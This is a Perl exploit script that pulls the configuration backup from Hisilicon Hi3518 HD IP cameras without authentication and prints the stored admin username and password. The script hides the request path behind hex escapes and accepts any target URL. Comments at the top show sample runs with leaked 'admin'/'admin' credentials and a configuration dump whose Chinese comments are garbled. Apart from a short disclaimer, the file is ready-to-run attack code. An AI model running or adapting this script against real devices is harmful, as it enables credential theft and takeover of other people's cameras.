#!/usr/bin/perl -w # # Hisilicon Hi3518 HD Camera Remote Configuration Disclosure # # Copyright 2019 (c) Todor Donev # # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # # [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure # # [ ========================================================== # # [ Exploit Author: Todor Donev 2019 # # [ Initializing the browser # # [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; OpenBSD) KHTML/3.5.9 (like Gecko) # # [ >> Content-Type => application/x-www-form-urlencoded # # [ << Connection => close # # [ << Date => Thu, 03 Oct 2019 13:11:15 GMT # # [ << Accept-Ranges => bytes # # [ << Server => thttpd/2.25b 29dec2003 # # [ << Content-Length => 23878 # # [ << Content-Type => application/octet-stream # # [ << Last-Modified => Thu, 03 Oct 2019 13:11:14 GMT # # [ << Client-Date => Thu, 03 Oct 2019 13:11:23 GMT # # [ << Client-Peer => 192.168.1.1:80 # # [ << Client-Response-Num => 1 # # [ # # [ Username : admin # # [ Password : admin # # # CONFIGURATION DUMP, TEST: # # # [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure # # [ ========================================================== # # [ Exploit Author: Todor Donev 2019 # # [ Initializing the browser # # [ >> User-Agent => Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.14) Gecko/20080821 Firefox/2.0.0.14 # # [ >> Content-Type => application/x-www-form-urlencoded # # [ << Connection => close # # [ << Date => Thu, 03 Oct 2019 13:13:05 GMT # # [ << Accept-Ranges => bytes # # [ << Server => thttpd/2.25b 29dec2003 # # [ << Content-Length => 23878 # # [ << Content-Type => application/octet-stream # # [ << Last-Modified => Thu, 03 Oct 2019 13:13:04 GMT # # [ << Client-Date => Thu, 03 Oct 2019 13:13:13 GMT # # [ << Client-Peer => 192.168.1.1:80 # # [ << Client-Response-Num => 1 # # [ # # [ >> Configuration dump... # # [ # # [ # # [debuglog] # # [ minlevel = "7 ";ȡֵ��Χ: # # [ ; 0," " # # [ ; 1,"# # [fatal ]" # # [ ; 2,"# # [error ]" # # [ ; 3,"# # [warn ]" # # [ ; 4,"# # [info ]" # # [ ; 5,"# # [debug ]" # # [ ; 6,"# # [debug1 ]" # # [ ; 7,"# # [debug2 ]" # # [ lenmsg = "512 ";Ӧ����������ij�� # # [ syslog = "n " ;�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾ # # [ savefile = "y " ;�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½; # # [ filename = "/bin/vs/log/debuglog.txt "; # # [ filemaxsize = "500 ";�����ļ�����������,��KBΪ��λ # # [ # # [ # # [syslog] # # [ minlevel = "7 ";ȡֵ��Χ: # # [ ; 0," " # # [ ; 1,"# # [fatal ]" # # [ ; 2,"# # [error ]" # # [ ; 3,"# # [warn ]" # # [ ; 4,"# # [info ]" # # [ ; 5,"# # [debug ]" # # [ ; 6,"# # [debug1 ]" # # [ ; 7,"# # [debug2 ]" # # [ lenmsg = "512 ";Ӧ����������ij�� # # [ syslog = "y ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾ # # [ savefile = "n ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½; # # [ filename = " "; # # [ filemaxsize = " ";�����ļ�����������,��KBΪ��λ # # [ # # [ # # [accesslog] # # [ minlevel = "5 ";ȡֵ��Χ: # # [ ; 0," " # # [ ; 1,"# # [fatal ]" # # [ ; 2,"# # [error ]" # # [ ; 3,"# # [warn ]" # # [ ; 4,"# # [info ]" # # [ ; 5,"# # [debug ]" # # [ ; 6,"# # [debug1 ]" # # [ ; 7,"# # [debug2 ]" # # [ lenmsg = "512 ";Ӧ����������ij�� # # [ syslog = "n ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾ # # [ savefile = "y ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½; # # [ filename = "/bin/vs/log/accesslog.txt "; # # use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use Gzip::Faster 'gunzip'; my $host = shift || ''; # Full path url to the store my $cmd = shift || ''; # show - Show configuration dump $host =~ s/\/$//; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print STDERR "[ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure\n"; print STDERR "[ ==========================================================\n"; print STDERR "[ Exploit Author: Todor Donev 2019 \n"; if ($host !~ m/^http/){ print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; exit; } print STDERR "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print STDERR "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; print STDERR "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; my $gzipped = $response->content(); my $config = gunzip($gzipped); print STDERR "[ \n"; if ($cmd =~ /show/) { print STDERR "[ >> Configuration dump...\n[\n"; print "[ ", $_, "\n" for split(/\n/,$config); exit; } else { print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); exit; }